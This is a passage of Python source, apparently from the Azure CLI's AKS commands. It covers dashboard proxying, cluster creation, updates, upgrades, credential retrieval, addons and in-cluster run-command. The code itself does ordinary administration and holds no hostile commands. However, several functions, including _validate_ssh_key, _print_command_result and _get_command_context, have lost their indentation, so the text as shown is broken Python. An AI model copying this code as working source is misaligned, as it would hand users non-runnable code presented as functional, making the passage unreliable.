            raise ResourceNotFoundError('Could not find dashboard pod: {} Command output: {}'.format(err, err.output))
        if dashboard_pod:
            # remove any "pods/" or "pod/" prefix from the name
            dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
        else:
            raise ResourceNotFoundError("Couldn't find the Kubernetes dashboard pod.")
        # find the port
        try:
            dashboard_port = subprocess.check_output(
                [
                    "kubectl",
                    "get",
                    "pods",
                    "--kubeconfig",
                    browse_path,
                    "--namespace",
                    "kube-system",
                    "--selector",
                    "k8s-app=kubernetes-dashboard",
                    "--output",
                    "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'",
                ],
                universal_newlines=True,
                stderr=subprocess.STDOUT,
            )
            # output format: "'{port}'"
            dashboard_port = int((dashboard_port.replace("'", "")))
        except subprocess.CalledProcessError as err:
            raise ResourceNotFoundError('Could not find dashboard port: {} Command output: {}'.format(err, err.output))
        # use https if dashboard container is using https
        if dashboard_port == 8443:
            protocol = 'https'
        else:
            protocol = 'http'
        proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
        dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
                                                                                                            protocol)
        # launch kubectl port-forward locally to access the remote dashboard
        if in_cloud_console():
            # TODO: better error handling here.
            response = requests.post(
                'http://localhost:8888/openport/{0}'.format(listen_port))
            result = json.loads(response.text)
            dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
                result['url'], protocol)
            term_id = os.environ.get('ACC_TERM_ID')
            if term_id:
                response = requests.post(
                    "http://localhost:8888/openLink/{0}".format(term_id),
                    json={"url": dashboardURL},
                )
            logger.warning(
                'To view the console, please open %s in a new tab', dashboardURL)
        else:
            logger.warning('Proxy running on %s', proxy_url)
        timeout = None
        test_hook_data = get_cmd_test_hook_data("test_aks_browse_legacy.hook")
        if test_hook_data:
            test_configs = test_hook_data.get("configs", None)
            if test_configs and test_configs.get("enableTimeout", False):
                timeout = test_configs.get("timeoutInterval", None)
        logger.warning('Press CTRL+C to close the tunnel...')
        if not disable_browser:
            wait_then_open_async(dashboardURL)
        try:
            try:
                subprocess.check_output(
                    [
                        "kubectl",
                        "--kubeconfig",
                        browse_path,
                        "proxy",
                        "--address",
                        listen_address,
                        "--port",
                        listen_port,
                    ],
                    universal_newlines=True,
                    stderr=subprocess.STDOUT,
                    timeout=timeout,
                )
            except subprocess.CalledProcessError as err:
                # BUGFIX: the previous check used err.output.find(...), whose
                # return value is -1 (truthy) when the text is ABSENT and 0
                # (falsy) when it is the very first character — inverting the
                # intended branch. A substring test expresses the intent.
                if 'unknown flag: --address' in err.output:
                    return_msg = "Test Invalid Address! "
                    if listen_address != '127.0.0.1':
                        logger.warning(
                            '"--address" is only supported in kubectl v1.13 and later.')
                        logger.warning(
                            'The "--listen-address" argument will be ignored.')
                    try:
                        subprocess.call(["kubectl", "--kubeconfig",
                                         browse_path, "proxy", "--port", listen_port], timeout=timeout)
                    except subprocess.TimeoutExpired:
                        logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
                        return_msg = return_msg if return_msg else ""
                        return_msg += "Test Passed!"
                    except subprocess.CalledProcessError as new_err:
                        raise AzureInternalError(
                            "Could not open proxy: {} Command output: {}".format(
                                new_err, new_err.output
                            )
                        )
                else:
                    raise AzureInternalError(
                        "Could not open proxy: {} Command output: {}".format(
                            err, err.output
                        )
                    )
        except subprocess.TimeoutExpired:
            logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
            return_msg = return_msg if return_msg else ""
            return_msg += "Test Passed!"
        except KeyboardInterrupt:
            # Let command processing finish gracefully after the user presses [Ctrl+C]
            pass
        finally:
            if in_cloud_console():
                requests.post('http://localhost:8888/closeport/8001')
    finally:
        os.close(fd)
    return return_msg
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
               listen_address="127.0.0.1", listen_port="8001"):
    """Public entry point: open the Kubernetes dashboard/resources view.

    Thin wrapper that delegates to _aks_browse pinned to the GA
    container-service resource type.
    """
    return _aks_browse(cmd, client, resource_group_name, name,
                       disable_browser=disable_browser,
                       listen_address=listen_address,
                       listen_port=listen_port,
                       resource_type=ResourceType.MGMT_CONTAINERSERVICE)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value,  # pylint: disable=too-many-locals
               dns_name_prefix=None,
               location=None,
               admin_username="azureuser",
               windows_admin_username=None,
               windows_admin_password=None,
               enable_ahub=False,
               kubernetes_version='',
               node_vm_size="Standard_DS2_v2",
               node_osdisk_type=None,
               node_osdisk_size=0,
               node_osdisk_diskencryptionset_id=None,
               node_count=3,
               nodepool_name="nodepool1",
               nodepool_tags=None,
               nodepool_labels=None,
               service_principal=None, client_secret=None,
               no_ssh_key=False,
               disable_rbac=None,
               enable_rbac=None,
               vm_set_type=None,
               skip_subnet_role_assignment=False,
               os_sku=None,
               enable_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               network_plugin=None,
               network_policy=None,
               uptime_sla=False,
               pod_cidr=None,
               service_cidr=None,
               dns_service_ip=None,
               docker_bridge_address=None,
               load_balancer_sku=None,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               outbound_type=None,
               auto_upgrade_channel=None,
               enable_addons=None,
               workspace_resource_id=None,
               vnet_subnet_id=None,
               ppg=None,
               max_pods=0,
               min_count=None,
               max_count=None,
               aad_client_app_id=None,
               aad_server_app_id=None,
               aad_server_app_secret=None,
               aad_tenant_id=None,
               tags=None,
               zones=None,
               enable_node_public_ip=False,
               node_public_ip_prefix_id=None,
               generate_ssh_keys=False,  # pylint: disable=unused-argument
               api_server_authorized_ip_ranges=None,
               enable_private_cluster=False,
               private_dns_zone=None,
               fqdn_subdomain=None,
               disable_public_fqdn=False,
               enable_managed_identity=True,
               assign_identity=None,
               attach_acr=None,
               enable_aad=False,
               aad_admin_group_object_ids=None,
               aci_subnet_name=None,
               appgw_name=None,
               appgw_subnet_cidr=None,
               appgw_id=None,
               appgw_subnet_id=None,
               appgw_watch_namespace=None,
               enable_sgxquotehelper=False,
               enable_encryption_at_host=False,
               enable_secret_rotation=False,
               rotation_poll_interval=None,
               assign_kubelet_identity=None,
               enable_ultra_ssd=False,
               edge_zone=None,
               disable_local_accounts=False,
               enable_fips_image=False,
               no_wait=False,
               yes=False,
               enable_azure_rbac=False,
               aks_custom_headers=None):
    """Create a managed Kubernetes (AKS) cluster.

    Every keyword argument is captured verbatim via ``locals()`` and handed
    to AKSCreateDecorator, which builds the ManagedCluster profile and issues
    the create request. Because of that capture, no local variables may be
    introduced (and no parameters renamed) before the ``locals()`` call.
    Returns None when the decorator signals an early, intentional exit.
    """
    # DO NOT MOVE: get all the original parameters and save them as a dictionary
    raw_parameters = locals()
    # decorator pattern
    from .decorator import AKSCreateDecorator
    aks_create_decorator = AKSCreateDecorator(
        cmd=cmd,
        client=client,
        raw_parameters=raw_parameters,
        resource_type=ResourceType.MGMT_CONTAINERSERVICE,
    )
    try:
        # construct mc profile
        mc = aks_create_decorator.construct_default_mc_profile()
    except DecoratorEarlyExitException:
        # exit gracefully
        return None
    # send request to create a real managed cluster
    return aks_create_decorator.create_mc(mc)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
    """Disable the given comma-separated *addons* on a managed cluster and
    submit the updated cluster model."""
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    instance = _update_addons(
        cmd, instance, subscription_id, resource_group_name, name, addons,
        enable=False, no_wait=no_wait)
    # send the managed cluster representation to update the addon profiles
    return sdk_no_wait(no_wait, client.begin_create_or_update,
                       resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
                      workspace_resource_id=None,
                      subnet_name=None,
                      appgw_name=None,
                      appgw_subnet_cidr=None,
                      appgw_id=None,
                      appgw_subnet_id=None,
                      appgw_watch_namespace=None,
                      enable_sgxquotehelper=False,
                      enable_secret_rotation=False,
                      rotation_poll_interval=None,
                      no_wait=False):
    """Enable one or more comma-separated addons on an existing managed cluster.

    Mutates the cluster's addon profiles via _update_addons, then PUTs the
    updated model. When the monitoring, ingress-appgw, or virtual-node addon is
    being enabled the operation is awaited (ignoring --no-wait) because the
    finished cluster object is needed for the follow-up role assignments.
    """
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    # toggle the requested addon profiles on the in-memory managed cluster
    instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
                              workspace_resource_id=workspace_resource_id,
                              subnet_name=subnet_name,
                              appgw_name=appgw_name,
                              appgw_subnet_cidr=appgw_subnet_cidr,
                              appgw_id=appgw_id,
                              appgw_subnet_id=appgw_subnet_id,
                              appgw_watch_namespace=appgw_watch_namespace,
                              enable_sgxquotehelper=enable_sgxquotehelper,
                              enable_secret_rotation=enable_secret_rotation,
                              rotation_poll_interval=rotation_poll_interval,
                              no_wait=no_wait)
    enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
        and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
        and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
    # virtual node addon profile keys carry an OS suffix; only Linux exists today
    os_type = 'Linux'
    virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
    enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
                           instance.addon_profiles[virtual_node_addon_name].enabled)
    # these three addons require the LRO result for post-enable role assignments
    need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
    if need_pull_for_result:
        if enable_monitoring:
            # provision the Log Analytics link before updating the cluster
            ensure_container_insights_for_monitoring(
                cmd,
                instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
                subscription_id,
                resource_group_name,
                name,
                instance.location,
                aad_route=False,
            )
        # adding a wait here since we rely on the result for role assignment
        result = LongRunningOperation(cmd.cli_ctx)(
            client.begin_create_or_update(resource_group_name, name, instance))
        if enable_monitoring:
            cloud_name = cmd.cli_ctx.cloud.name
            # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
            if cloud_name.lower() == 'azurecloud':
                from msrestazure.tools import resource_id
                cluster_resource_id = resource_id(
                    subscription=subscription_id,
                    resource_group=resource_group_name,
                    namespace='Microsoft.ContainerService', type='managedClusters',
                    name=name
                )
                add_monitoring_role_assignment(
                    result, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            add_ingress_appgw_addon_role_assignment(result, cmd)
        if enable_virtual_node:
            # All agent pool will reside in the same vnet, we will grant vnet level Contributor role
            # in later function, so using a random agent pool here is OK
            random_agent_pool = result.agent_pool_profiles[0]
            if random_agent_pool.vnet_subnet_id != "":
                add_virtual_node_role_assignment(
                    cmd, result, random_agent_pool.vnet_subnet_id)
            # Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
            # we don't need to handle it in client side in this case.
    else:
        result = sdk_no_wait(no_wait, client.begin_create_or_update,
                             resource_group_name, name, instance)
    return result
def aks_get_versions(cmd, client, location):
    """List the orchestrator (Kubernetes) versions available in *location*."""
    versions = client.list_orchestrators(location, resource_type='managedClusters')
    return versions
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
                        path=os.path.join(os.path.expanduser(
                            '~'), '.kube', 'config'),
                        overwrite_existing=False, context_name=None, public_fqdn=False):
    """Fetch cluster access credentials and print or merge them into a kubeconfig.

    *admin* selects the cluster-admin credential; *public_fqdn* asks the
    service for the public endpoint. When *path* is left at its default and
    KUBECONFIG is set, the first entry of KUBECONFIG is used instead.
    Raises CLIError when no credentials or no kubeconfig payload are returned.
    """
    credentialResults = None
    serverType = None
    if public_fqdn:
        serverType = 'public'
    if admin:
        if serverType is None:
            credentialResults = client.list_cluster_admin_credentials(
                resource_group_name, name)
        else:
            credentialResults = client.list_cluster_admin_credentials(
                resource_group_name, name, serverType)
    else:
        if serverType is None:
            credentialResults = client.list_cluster_user_credentials(
                resource_group_name, name)
        else:
            credentialResults = client.list_cluster_user_credentials(
                resource_group_name, name, serverType)
    # Check if KUBECONFIG environmental variable is set
    # If path is different than default then that means -f/--file is passed
    # in which case we ignore the KUBECONFIG variable
    # KUBECONFIG entries are separated by os.pathsep (':' on POSIX, ';' on
    # Windows). BUGFIX: the previous hard-coded ':' split broke Windows paths
    # such as "C:\\Users\\...\\config". Use the first entry.
    if "KUBECONFIG" in os.environ and path == os.path.join(os.path.expanduser('~'), '.kube', 'config'):
        path = os.environ["KUBECONFIG"].split(os.pathsep)[0]
    if not credentialResults:
        raise CLIError("No Kubernetes credentials found.")
    try:
        kubeconfig = credentialResults.kubeconfigs[0].value.decode(
            encoding='UTF-8')
        _print_or_merge_credentials(
            path, kubeconfig, overwrite_existing, context_name)
    except (IndexError, ValueError):
        raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
    """List managed clusters in a resource group, or subscription-wide when no group is given."""
    if resource_group_name:
        clusters = client.list_by_resource_group(resource_group_name)
    else:
        clusters = client.list()
    # strip null-valued properties before returning for display
    return _remove_nulls(list(clusters))
def aks_show(cmd, client, resource_group_name, name):
    """Fetch one managed cluster and strip null-valued properties for display."""
    managed_cluster = client.get(resource_group_name, name)
    return _remove_nulls([managed_cluster])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
                           reset_service_principal=False,
                           reset_aad=False,
                           service_principal=None,
                           client_secret=None,
                           aad_server_app_id=None,
                           aad_server_app_secret=None,
                           aad_client_app_id=None,
                           aad_tenant_id=None,
                           no_wait=False):
    """Reset either the service principal profile or the (legacy) AAD profile
    of a managed cluster. Exactly one of the two reset modes must be chosen."""
    ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='managed_clusters')
    # both-or-neither is a usage error
    if bool(reset_service_principal) == bool(reset_aad):
        raise CLIError(
            'usage error: --reset-service-principal | --reset-aad-profile')
    if reset_service_principal:
        if service_principal is None or client_secret is None:
            raise CLIError(
                'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
        sp_profile = ManagedClusterServicePrincipalProfile(
            client_id=service_principal, secret=client_secret)
        return sdk_no_wait(no_wait,
                           client.begin_reset_service_principal_profile,
                           resource_group_name,
                           name, sp_profile)
    # reset_aad path: all three app parameters are required
    if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
        raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
                       '--aad-server-app-secret SECRET [--aad-tenant-id ID]')
    parameters = {
        'clientAppID': aad_client_app_id,
        'serverAppID': aad_server_app_id,
        'serverAppSecret': aad_server_app_secret,
        'tenantID': aad_tenant_id
    }
    return sdk_no_wait(no_wait,
                       client.begin_reset_aad_profile,
                       resource_group_name,
                       name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
    """Scale the node count of a nodepool in a managed cluster.

    An empty *nodepool_name* is only allowed on single-pool clusters; pools
    with the cluster autoscaler enabled cannot be scaled manually.
    """
    instance = client.get(resource_group_name, name)
    if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There are more than one node pool in the cluster. '
                       'Please specify nodepool name or use az aks nodepool command to scale node pool')
    for agent_profile in instance.agent_pool_profiles:
        matched = (agent_profile.name == nodepool_name or
                   (nodepool_name == "" and len(instance.agent_pool_profiles) == 1))
        if not matched:
            continue
        if agent_profile.enable_auto_scaling:
            raise CLIError(
                "Cannot scale cluster autoscaler enabled node pool.")
        agent_profile.count = int(node_count)  # pylint: disable=no-member
        # null out the SP and AAD profile because otherwise validation complains
        instance.service_principal_profile = None
        instance.aad_profile = None
        return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
    raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
               enable_cluster_autoscaler=False,
               disable_cluster_autoscaler=False,
               update_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               min_count=None, max_count=None,
               uptime_sla=False,
               no_uptime_sla=False,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               attach_acr=None,
               detach_acr=None,
               api_server_authorized_ip_ranges=None,
               enable_aad=False,
               aad_tenant_id=None,
               aad_admin_group_object_ids=None,
               enable_ahub=False,
               disable_ahub=False,
               windows_admin_password=None,
               auto_upgrade_channel=None,
               enable_managed_identity=False,
               assign_identity=None,
               disable_local_accounts=False,
               enable_local_accounts=False,
               yes=False,
               no_wait=False,
               enable_public_fqdn=False,
               disable_public_fqdn=False,
               enable_azure_rbac=False,
               disable_azure_rbac=False,
               enable_secret_rotation=False,
               disable_secret_rotation=False,
               rotation_poll_interval=None,
               tags=None,
               nodepool_labels=None,
               aks_custom_headers=None):
    """Update settings of an existing managed Kubernetes (AKS) cluster.

    All keyword arguments are captured verbatim via ``locals()`` and handed
    to AKSUpdateDecorator, which applies them to the cluster model and issues
    the update request. Because of that capture, no local variables may be
    introduced (and no parameters renamed) before the ``locals()`` call.
    Returns None when the decorator signals an early, intentional exit.
    """
    # DO NOT MOVE: get all the original parameters and save them as a dictionary
    raw_parameters = locals()
    # decorator pattern
    from .decorator import AKSUpdateDecorator
    aks_update_decorator = AKSUpdateDecorator(
        cmd=cmd,
        client=client,
        raw_parameters=raw_parameters,
        resource_type=ResourceType.MGMT_CONTAINERSERVICE,
    )
    try:
        # update mc profile
        mc = aks_update_decorator.update_default_mc_profile()
    except DecoratorEarlyExitException:
        # exit gracefully
        return None
    # send request to update the real managed cluster
    return aks_update_decorator.update_mc(mc)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
                client,
                resource_group_name, name,
                kubernetes_version='',
                control_plane_only=False,
                node_image_only=False,
                no_wait=False,
                yes=False):
    """Upgrade a managed cluster to *kubernetes_version*, or node images only.

    --node-image-only upgrades every nodepool's node image (VMSS clusters
    only) and is mutually exclusive with a version upgrade. For legacy
    clusters (max_agent_pools < 8 or availability-set pools) node pools are
    always upgraded along with the control plane. Interactive confirmation
    prompts are skipped with *yes*. Returns None when the user declines.
    """
    msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
    if not yes and not prompt_y_n(msg, default="n"):
        return None
    instance = client.get(resource_group_name, name)
    # detect availability-set (non-VMSS) pools; they constrain what is allowed
    vmas_cluster = False
    for agent_profile in instance.agent_pool_profiles:
        if agent_profile.type.lower() == "availabilityset":
            vmas_cluster = True
            break
    if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')
    if node_image_only:
        # BUGFIX: the two string fragments previously concatenated without a
        # space, rendering "...in the clusterand might take a while...".
        msg = "This node image upgrade operation will run across every node pool in the cluster " \
              "and might take a while, do you wish to continue?"
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        # This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
        # nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
        for agent_pool_profile in instance.agent_pool_profiles:
            if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
                               'can only be applied on VirtualMachineScaleSets cluster.')
            agent_pool_client = cf_agent_pools(cmd.cli_ctx)
            _upgrade_single_nodepool_image_version(True, agent_pool_client,
                                                   resource_group_name, name, agent_pool_profile.name)
        mc = client.get(resource_group_name, name)
        return _remove_nulls([mc])[0]
    if instance.kubernetes_version == kubernetes_version:
        if instance.provisioning_state == "Succeeded":
            logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
                           "will occur when upgrading to the same version if the cluster is not in a failed state.",
                           instance.kubernetes_version)
        elif instance.provisioning_state == "Failed":
            logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
                           "attempt resolution of failed cluster state.", instance.kubernetes_version)
    upgrade_all = False
    instance.kubernetes_version = kubernetes_version
    # for legacy clusters, we always upgrade node pools with CCP.
    if instance.max_agent_pools < 8 or vmas_cluster:
        if control_plane_only:
            msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
                   "upgraded to {} as well. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
        upgrade_all = True
    else:
        if not control_plane_only:
            msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
                   "AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            upgrade_all = True
        else:
            msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
                   "Node pool will not change. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
    if upgrade_all:
        for agent_profile in instance.agent_pool_profiles:
            agent_profile.orchestrator_version = kubernetes_version
    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
    """Kick off a node-image-only upgrade for a single nodepool."""
    return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version,
                       resource_group_name, cluster_name, nodepool_name)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
    """Execute *command_string* inside the cluster via the run-command API and
    print its result (attaching *command_files* as a zipped context)."""
    colorama.init()
    managed_cluster = client.get(resource_group_name, name)
    if not command_string:
        raise ValidationError('Command cannot be empty.')
    RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                       operation_group='managed_clusters')
    payload = RunCommandRequest(command=command_string)
    payload.context = _get_command_context(command_files)
    # if this cluster have Azure AD enabled, we should pass user token.
    # so the command execution also using current user identity.
    # here we aquire token for AKS managed server AppID (same id for all cloud)
    if managed_cluster.aad_profile is not None and managed_cluster.aad_profile.managed:
        payload.cluster_token = _get_dataplane_aad_token(
            cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
    poller = client.begin_run_command(
        resource_group_name, name, payload, polling_interval=5, retry_total=0)
    # wait up to 300s for the command to complete, then pretty-print
    return _print_command_result(cmd.cli_ctx, poller.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
    """Fetch and display the result of a previously issued run-command invocation."""
    if not command_id:
        raise ValidationError('CommandID cannot be empty.')
    result = client.get_command_result(resource_group_name, name, command_id)
    return _print_command_result(cmd.cli_ctx, result)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains list of parameter name user typed in, without value.
# cli core also use this calculate ParameterSetName header for all http request from cli.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
# user didn't specified any format, we can customize the print for best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# . means to attach current folder, cannot combine more files. (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
    """Acquire the current user's AAD access token for the given dataplane server app id."""
    # this function is mostly copied from keyvault cli
    profile = Profile(cli_ctx=cli_ctx)
    creds = profile.get_raw_token(resource=serverAppId)[0]
    return creds[2].get('accessToken')
# Name and implementation module of the Azure Dev Spaces CLI extension,
# installed on demand by aks_use_dev_spaces / aks_remove_dev_spaces below.
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
                       endpoint_type='Public', prompt=False):
    """
    Use Azure Dev Spaces with a managed Kubernetes cluster.
    :param name: Name of the managed cluster.
    :type name: String
    :param resource_group_name: Name of resource group. You can configure the default group. \
    Using 'az configure --defaults group=<name>'.
    :type resource_group_name: String
    :param update: Update to the latest Azure Dev Spaces client components.
    :type update: bool
    :param space_name: Name of the new or existing dev space to select. Defaults to an \
    interactive selection experience.
    :type space_name: String
    :param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
    See https://aka.ms/azds-networking for more information.
    :type endpoint_type: String
    :param prompt: Do not prompt for confirmation. Requires --space.
    :type prompt: bool
    """
    # bail out silently when the extension cannot be installed/loaded
    if not _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
        return
    azext_custom = _get_azext_module(
        DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
    try:
        azext_custom.ads_use_dev_spaces(
            name, resource_group_name, update, space_name, endpoint_type, prompt)
    except TypeError:
        raise CLIError(
            "Use '--update' option to get the latest Azure Dev Spaces client components.")
    except AttributeError as ae:
        raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
    """
    Remove Azure Dev Spaces from a managed Kubernetes cluster.

    :param name: Name of the managed cluster.
    :type name: String
    :param resource_group_name: Name of resource group. You can configure the default group. \
    Using 'az configure --defaults group=<name>'.
    :type resource_group_name: String
    :param prompt: Do not prompt for confirmation.
    :type prompt: bool
    """
    # Bail out silently when the dev-spaces extension could not be acquired.
    if not _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
        return
    azext_custom = _get_azext_module(
        DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
    try:
        azext_custom.ads_remove_dev_spaces(
            name, resource_group_name, prompt)
    except AttributeError as ae:
        raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
    """Rotate the certificates of a managed cluster (long-running operation).

    Defaults to fire-and-forget (no_wait=True); set no_wait=False to block
    until the rotation completes.
    """
    rotate_op = client.begin_rotate_cluster_certificates
    return sdk_no_wait(no_wait, rotate_op, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
                   workspace_resource_id=None,
                   subnet_name=None,
                   appgw_name=None,
                   appgw_subnet_cidr=None,
                   appgw_id=None,
                   appgw_subnet_id=None,
                   appgw_watch_namespace=None,
                   enable_sgxquotehelper=False,
                   enable_secret_rotation=False,
                   disable_secret_rotation=False,
                   rotation_poll_interval=None,
                   no_wait=False):
    """Enable or disable addon profiles on an existing managed cluster.

    Parses the comma-separated ``addons`` argument, validates each name against
    the ADDONS map, and mutates ``instance.addon_profiles`` in place — either
    enabling addons (building per-addon config from the keyword arguments) or
    disabling them (clearing their config). Returns the mutated ``instance``;
    the actual PUT to the service happens in the caller.

    Raises CLIError (or addon-specific error types) when an addon name is
    invalid, an addon being enabled is already enabled, or a required
    parameter for an addon is missing.
    """
    ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
                                                resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                operation_group='managed_clusters')
    # parse the comma-separated addons argument
    addon_args = addons.split(',')

    addon_profiles = instance.addon_profiles or {}

    # Virtual-node addon names are suffixed with the node OS type.
    os_type = 'Linux'

    # for each addons argument
    for addon_arg in addon_args:
        if addon_arg not in ADDONS:
            raise CLIError("Invalid addon name: {}.".format(addon_arg))
        addon = ADDONS[addon_arg]
        if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
